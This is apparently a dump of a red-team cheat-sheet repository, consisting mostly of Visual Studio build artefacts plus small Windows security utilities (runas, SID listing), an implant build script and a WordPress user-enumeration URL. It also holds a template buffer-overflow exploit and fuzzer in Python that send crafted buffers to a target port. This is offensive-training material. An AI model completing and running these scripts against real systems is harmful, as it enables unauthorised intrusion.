PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30133:TargetPlatformVersion=10.0.19041.0: 2 | Release|x64|C:\Users\user\source\repos\Security\| 3 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/imp/x64/Release/imp.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/imp/x64/Release/imp.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/imp/x64/Release/imp.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/imp/x64/Release/imp.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/imp/x64/Release/imp.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/imp/x64/Release/imp.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/imp/x64/Release/vc142.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/imp/x64/Release/vc142.pdb -------------------------------------------------------------------------------- /coding/projects/Windows_Security/runas/runas.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int wmain(int argc, wchar_t* argv[]) 5 | { 6 | if (argc < 3) { 7 | printf("Usage: runas <[domain\\]username <\"commandline\">\n"); 8 | return 0; 9 | } 10 | 11 | printf("Password: "); 12 | WCHAR password[64]; 13 | _getws_s(password); 14 | 15 | PCWSTR domain = L"."; 16 | PCWSTR username = argv[1]; 17 | auto backslash = wcschr(argv[1], L'\\'); 18 | if (backslash) { 19 | domain = argv[1]; 20 | *backslash = L'\0'; 21 | username = backslash + 1; 22 | } 23 | 24 | STARTUPINFO si = { sizeof(si) }; 25 | PROCESS_INFORMATION pi; 26 | 27 | if (!::CreateProcessWithLogonW(username, domain, password, 28 | LOGON_WITH_PROFILE, nullptr, argv[2], 0, nullptr, nullptr, 29 | &si, &pi)) { 30 | printf("Error launching process (%u)\n", ::GetLastError()); 31 | return 1; 32 | } 33 | 34 | printf("Launched process %u\n", pi.dwProcessId); 35 | 36 | ::CloseHandle(pi.hProcess); 37 | ::CloseHandle(pi.hThread); 38 | return 0; 39 | } 40 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/runas/runas.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/runas/runas.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/runas/x64/Release/runas.exe.recipe: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | C:\Users\user\source\repos\Security\x64\Release\runas.exe 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/runas/x64/Release/runas.iobj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/runas/x64/Release/runas.iobj -------------------------------------------------------------------------------- /coding/projects/Windows_Security/runas/x64/Release/runas.ipdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/runas/x64/Release/runas.ipdb -------------------------------------------------------------------------------- /coding/projects/Windows_Security/runas/x64/Release/runas.log: -------------------------------------------------------------------------------- 1 |  runas.cpp 2 | Generating code 3 | Previous IPDB not found, fall back to full compilation. 4 | All 6 functions were compiled because no usable IPDB/IOBJ from previous compilation was found. 5 | Finished generating code 6 | runas.vcxproj -> C:\Users\user\source\repos\Security\x64\Release\runas.exe 7 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/runas/x64/Release/runas.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/runas/x64/Release/runas.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/runas/x64/Release/runas.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/runas/x64/Release/runas.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/runas/x64/Release/runas.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/runas/x64/Release/runas.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/runas/x64/Release/runas.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/runas/x64/Release/runas.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/runas/x64/Release/runas.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/runas/x64/Release/runas.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/runas/x64/Release/runas.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/runas/x64/Release/runas.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/runas/x64/Release/runas.tlog/runas.lastbuildstate: -------------------------------------------------------------------------------- 1 | PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30133:TargetPlatformVersion=10.0.19041.0: 2 | Release|x64|C:\Users\user\source\repos\Security\| 3 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/runas/x64/Release/vc142.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/runas/x64/Release/vc142.pdb -------------------------------------------------------------------------------- /coding/projects/Windows_Security/token/token.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/token/token.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/token/x64/Release/token.exe.recipe: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | C:\Users\user\source\repos\Security\x64\Release\token.exe 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/token/x64/Release/token.iobj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/token/x64/Release/token.iobj -------------------------------------------------------------------------------- /coding/projects/Windows_Security/token/x64/Release/token.ipdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/token/x64/Release/token.ipdb -------------------------------------------------------------------------------- /coding/projects/Windows_Security/token/x64/Release/token.log: -------------------------------------------------------------------------------- 1 |  token.cpp 2 | Generating code 3 | 2 of 96 functions ( 2.1%) were compiled, the rest were copied from previous compilation. 4 | 1 functions were new in current compilation 5 | 0 functions had inline decision re-evaluated but remain unchanged 6 | Finished generating code 7 | token.vcxproj -> C:\Users\user\source\repos\Security\x64\Release\token.exe 8 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/token/x64/Release/token.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/token/x64/Release/token.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/token/x64/Release/token.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/token/x64/Release/token.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/token/x64/Release/token.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/token/x64/Release/token.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/token/x64/Release/token.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/token/x64/Release/token.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/token/x64/Release/token.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/token/x64/Release/token.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/token/x64/Release/token.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/token/x64/Release/token.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/token/x64/Release/token.tlog/token.lastbuildstate: -------------------------------------------------------------------------------- 1 | PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30133:TargetPlatformVersion=10.0.19041.0: 2 | Release|x64|C:\Users\user\source\repos\Security\| 3 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/token/x64/Release/vc142.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/token/x64/Release/vc142.pdb -------------------------------------------------------------------------------- /coding/projects/Windows_Security/wellknownsids/wellknownsids.cpp: -------------------------------------------------------------------------------- 1 | // wellknownsids.cpp : This file contains the 'main' function. Program execution begins and ends there. 2 | // 3 | 4 | #include 5 | #include 6 | #include "..\SecurityHelper\SecurityHelper.h" 7 | 8 | int main() 9 | { 10 | BYTE buffer[SECURITY_MAX_SID_SIZE]; 11 | PSID sid = (PSID)buffer; 12 | 13 | for(int i = 0; i < 120; i++) { 14 | DWORD len = sizeof(buffer); 15 | if (!::CreateWellKnownSid((WELL_KNOWN_SID_TYPE)i, nullptr, sid, &len)) 16 | continue; 17 | 18 | printf("%3d: %ws (%ws)\n", i, SidToString(sid).c_str(), SidToUserName(sid).c_str()); 19 | } 20 | return 0; 21 | } 22 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/wellknownsids/wellknownsids.vcxproj.filters: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF} 6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx 7 | 8 | 9 | {93995380-89BD-4b04-88EB-625FBE52EBFB} 10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd 11 | 12 | 13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} 14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms 15 | 16 | 17 | 18 | 19 | Source Files 20 | 21 | 22 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/wellknownsids/wellknownsids.vcxproj.user: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/wellknownsids/x64/Debug/vc142.idb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/wellknownsids/x64/Debug/vc142.idb -------------------------------------------------------------------------------- /coding/projects/Windows_Security/wellknownsids/x64/Debug/vc142.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/wellknownsids/x64/Debug/vc142.pdb -------------------------------------------------------------------------------- /coding/projects/Windows_Security/wellknownsids/x64/Debug/wellknownsids.log: -------------------------------------------------------------------------------- 1 | wellknownsids.obj : error LNK2019: unresolved external symbol "class std::basic_string,class std::allocator > __cdecl SidToString(void * const)" (?SidToString@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QEAX@Z) referenced in function main 2 | C:\Users\user\source\repos\Security\x64\Debug\wellknownsids.exe : fatal error LNK1120: 1 unresolved externals 3 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/wellknownsids/x64/Debug/wellknownsids.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/wellknownsids/x64/Debug/wellknownsids.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/wellknownsids/x64/Debug/wellknownsids.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/wellknownsids/x64/Debug/wellknownsids.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/wellknownsids/x64/Debug/wellknownsids.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/wellknownsids/x64/Debug/wellknownsids.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/wellknownsids/x64/Debug/wellknownsids.tlog/link-cvtres.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/wellknownsids/x64/Debug/wellknownsids.tlog/link-cvtres.read.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/wellknownsids/x64/Debug/wellknownsids.tlog/link-cvtres.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/wellknownsids/x64/Debug/wellknownsids.tlog/link-cvtres.write.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/wellknownsids/x64/Debug/wellknownsids.tlog/link-rc.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/wellknownsids/x64/Debug/wellknownsids.tlog/link-rc.read.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/wellknownsids/x64/Debug/wellknownsids.tlog/link-rc.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/wellknownsids/x64/Debug/wellknownsids.tlog/link-rc.write.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/wellknownsids/x64/Debug/wellknownsids.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/wellknownsids/x64/Debug/wellknownsids.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/wellknownsids/x64/Debug/wellknownsids.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/wellknownsids/x64/Debug/wellknownsids.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/wellknownsids/x64/Debug/wellknownsids.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/wellknownsids/x64/Debug/wellknownsids.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/wellknownsids/x64/Debug/wellknownsids.tlog/unsuccessfulbuild: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/wellknownsids/x64/Debug/wellknownsids.tlog/unsuccessfulbuild -------------------------------------------------------------------------------- /coding/projects/Windows_Security/wellknownsids/x64/Debug/wellknownsids.tlog/wellknownsids.lastbuildstate: -------------------------------------------------------------------------------- 1 | PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30133:TargetPlatformVersion=10.0.19041.0: 2 | Debug|x64|C:\Users\user\source\repos\Security\| 3 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/wellknownsids/x64/Release/vc142.pdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/wellknownsids/x64/Release/vc142.pdb -------------------------------------------------------------------------------- /coding/projects/Windows_Security/wellknownsids/x64/Release/wellknownsids.exe.recipe: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | C:\Users\user\source\repos\Security\x64\Release\wellknownsids.exe 6 | 7 | 8 | 9 | 10 | 11 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/wellknownsids/x64/Release/wellknownsids.iobj: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/wellknownsids/x64/Release/wellknownsids.iobj -------------------------------------------------------------------------------- /coding/projects/Windows_Security/wellknownsids/x64/Release/wellknownsids.ipdb: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/wellknownsids/x64/Release/wellknownsids.ipdb -------------------------------------------------------------------------------- /coding/projects/Windows_Security/wellknownsids/x64/Release/wellknownsids.log: -------------------------------------------------------------------------------- 1 |  wellknownsids.cpp 2 | Generating code 3 | 38 of 95 functions (40.0%) were compiled, the rest were copied from previous compilation. 4 | 0 functions were new in current compilation 5 | 2 functions had inline decision re-evaluated but remain unchanged 6 | Finished generating code 7 | wellknownsids.vcxproj -> C:\Users\user\source\repos\Security\x64\Release\wellknownsids.exe 8 | -------------------------------------------------------------------------------- /coding/projects/Windows_Security/wellknownsids/x64/Release/wellknownsids.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/wellknownsids/x64/Release/wellknownsids.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/wellknownsids/x64/Release/wellknownsids.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/wellknownsids/x64/Release/wellknownsids.tlog/CL.read.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/wellknownsids/x64/Release/wellknownsids.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/wellknownsids/x64/Release/wellknownsids.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/wellknownsids/x64/Release/wellknownsids.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/wellknownsids/x64/Release/wellknownsids.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/wellknownsids/x64/Release/wellknownsids.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/wellknownsids/x64/Release/wellknownsids.tlog/link.read.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/wellknownsids/x64/Release/wellknownsids.tlog/link.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/Windows_Security/wellknownsids/x64/Release/wellknownsids.tlog/link.write.1.tlog -------------------------------------------------------------------------------- /coding/projects/Windows_Security/wellknownsids/x64/Release/wellknownsids.tlog/wellknownsids.lastbuildstate: -------------------------------------------------------------------------------- 1 | PlatformToolSet=v142:VCToolArchitecture=Native32Bit:VCToolsVersion=14.29.30133:TargetPlatformVersion=10.0.19041.0: 2 | Release|x64|C:\Users\user\source\repos\Security\| 3 | -------------------------------------------------------------------------------- /coding/projects/WoW64/compile.bat: -------------------------------------------------------------------------------- 1 | @ECHO OFF 2 | 3 | cl.exe /nologo /Ox /MT /W0 /GS- /DNDEBUG /Tp *.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE 4 | del *.obj -------------------------------------------------------------------------------- /coding/projects/WoW64/execute64.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/WoW64/execute64.bin -------------------------------------------------------------------------------- /coding/projects/WoW64/wownative.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/0xJs/RedTeaming_CheatSheet/dc0471476c0dbb52a0f23b503089fb28d6c2f903/coding/projects/WoW64/wownative.bin -------------------------------------------------------------------------------- /coding/readme.md: -------------------------------------------------------------------------------- 1 | # Coding 2 | This section is new and will be expended during the upcoming year. 3 | 4 | * [General](#General) 5 | * [Malware Development notes](malware_development.md) 6 | * [Payloads](payloads.md) 7 | * [C#](csharp/readme.md) 8 | * [Cheatsheet](csharp/cheatsheet.md) 9 | * [C++](cplusplus/readme.md) 10 | * [Cheatsheet](cplusplus/cheatsheet.md) 11 | 12 | # General 13 | -------------------------------------------------------------------------------- /infrastructure/bufferoverflow/exploit.py: -------------------------------------------------------------------------------- 1 | import socket 2 | 3 | ip = "" 4 | port = 5 | 6 | prefix = "" 7 | offset = 0 8 | overflow = "A" * offset 9 | retn = "" 10 | padding = "" #"\x90" * 16 11 | payload = "" 12 | postfix = "" 13 | 14 | buffer = prefix + overflow + retn + padding + payload + postfix 15 | 16 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | 18 | try: 19 | s.connect((ip, port)) 20 | print("Sending evil buffer...") 21 | s.send(buffer + "\r\n") 22 | print("Done!") 23 | except: 24 | print("Could not connect.") 25 | -------------------------------------------------------------------------------- /infrastructure/bufferoverflow/fuzzing.py: -------------------------------------------------------------------------------- 1 | import socket, time, sys 2 | 3 | ip = "" 4 | port = 5 | prefix = "" 6 | timeout = 5 7 | 8 | buffer = [] 9 | counter = 100 10 | while len(buffer) < 30: 11 | buffer.append("A" * counter) 12 | counter += 100 13 | 14 | for string in buffer: 15 | try: 16 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 17 | s.settimeout(timeout) 18 | connect = s.connect((ip, port)) 19 | s.recv(1024) 20 | print("Fuzzing with %s bytes" % len(string)) 21 | s.send(prefix + string + "\r\n") 22 | s.recv(1024) 23 | s.close() 24 | except: 25 | print("Could not connect to " + ip + ":" + str(port)) 26 | sys.exit(0) 27 | time.sleep(1) 28 | -------------------------------------------------------------------------------- /misc.md: -------------------------------------------------------------------------------- 1 | # Random redteam notes I would like to checkout later 2 | 3 | 4 | - https://twitter.com/ShitSecure/status/1646431713227055105?t=rPrGrTMTWme-IMdaFXCM0g&s=08 5 | - https://gist.github.com/S3cur3Th1sSh1t/d9aad93027aad893adae8805d59e2d73 6 | -------------------------------------------------------------------------------- /python_dependancies.md: -------------------------------------------------------------------------------- 1 | # Best way to handle python dependancies 2 | - https://www.youtube.com/watch?v=ieyRV9zQd2U&t=2915s 3 | 4 | 5 | ## Pipx 6 | #### Install pipx 7 | ``` 8 | python3 -m pip install pipx 9 | python3 -m pipx ensurepath 10 | ``` 11 | 12 | #### Install tools/packages with pipx 13 | ``` 14 | pipx install package 15 | ``` 16 | 17 | ## Virtual env 18 | #### Install 19 | ``` 20 | sudo apt install python3.10-venv 21 | ``` 22 | 23 | #### Create virtual env 24 | ``` 25 | mkdir my_awesome_project 26 | cd my_awesome_project 27 | python3 -m venv .my_awesome_project_venv 28 | ``` 29 | 30 | #### Use virtual env 31 | ``` 32 | source .my_awesome_project_venv/bin/activate 33 | ``` 34 | 35 | #### Install python stuff 36 | ``` 37 | python3 -m pip install -r .\requirements.txt 38 | ``` 39 | -------------------------------------------------------------------------------- /web.md: -------------------------------------------------------------------------------- 1 | # Web 2 | 3 | ### WordPress 4 | #### User enum using API 5 | ``` 6 | https:///wp-json/wp/v2/users/1 7 | ``` 8 | --------------------------------------------------------------------------------